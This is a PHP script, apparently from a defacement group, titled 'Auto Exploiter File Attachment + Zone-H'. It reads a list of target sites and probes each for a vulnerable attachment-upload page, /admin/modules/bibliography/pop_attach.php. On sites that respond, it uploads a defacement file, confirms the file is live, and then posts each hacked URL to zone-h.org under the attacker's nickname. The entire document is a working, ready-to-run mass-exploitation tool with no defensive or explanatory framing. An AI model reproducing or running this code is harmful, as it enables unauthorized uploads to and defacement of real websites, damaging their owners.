Auto Exploiter File Attachment + Zone-H

1. <?php
2. /*
3. coded by ShinChan - N45HT | 04/03/2018
4. */
5. echo "
6.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
7. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
8. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
9. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
10.       File Attachment Auto Exploiter - coded by ShinChan
11.  
12. ";
13. echo "Input your target list: ";
14. $list = trim(fgets(STDIN));
15.  
16. $shell = "indoxx.txt";
17. $nickzoneh = "N45HT";
18. $exploit = "/admin/modules/bibliography/pop_attach.php";
19. $path = "/repository/";
20.  
21. $open = fopen("$list","r");
22. $size = filesize("$list");
23. $read = fread($open,$size);
24. $lists = explode("\r\n",$read);
25.  
26. echo "\n";
27.  
28. foreach($lists as $target){
29.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
30.         $targets = "http://$target";
31.     }else{
32.         $targets = $target;
33.     }
34.    
35.     echo "Target => $targets\n";
36.     echo "  [*] Checking Path : ";
37.  
38.     $cd = curl_init("$targets$exploit");
39.     curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
40.     curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
41.     curl_exec($cd);
42.     $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
43.     curl_close($cd);
44.    
45.     if($httpcode == 200){
46.         echo "200 OK\n";
47.         echo "  [*] Uploading shell : ";
48.         $ch = curl_init();
49.         curl_setopt($ch, CURLOPT_URL, "$targets/$exploit");
50.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
51.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
52.         curl_setopt($ch, CURLOPT_POST, 1);
53.         curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"shinchan" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang"));
54.         curl_exec($ch);
55.        
56.         $cek = curl_init();
57.         curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
58.         curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
59.         curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
60.         $ceek = curl_exec($cek);
61.         $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
62.        
63.         if(preg_match("/hacked/",$ceek) or $ceeks == 200){
64.             echo "OK $targets$path$shell\n";
65.             echo "  [*] Zone-H : ";
66.             $zh = curl_init("http://zone-h.org/notify/single");
67.             curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
68.             curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
69.             curl_setopt($zh, CURLOPT_POST, 1);
70.             curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
71.  
72.             $postzh = curl_exec($zh);
73.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
74.                 echo "OK\n\n";
75.             }else{
76.                 echo "NO\n\n";
77.             }
78.         }else{
79.             echo "Failed\n\n";
80.         }
81.     }else{
82.         echo "Not Vulnerable\n\n";
83.     }
84. }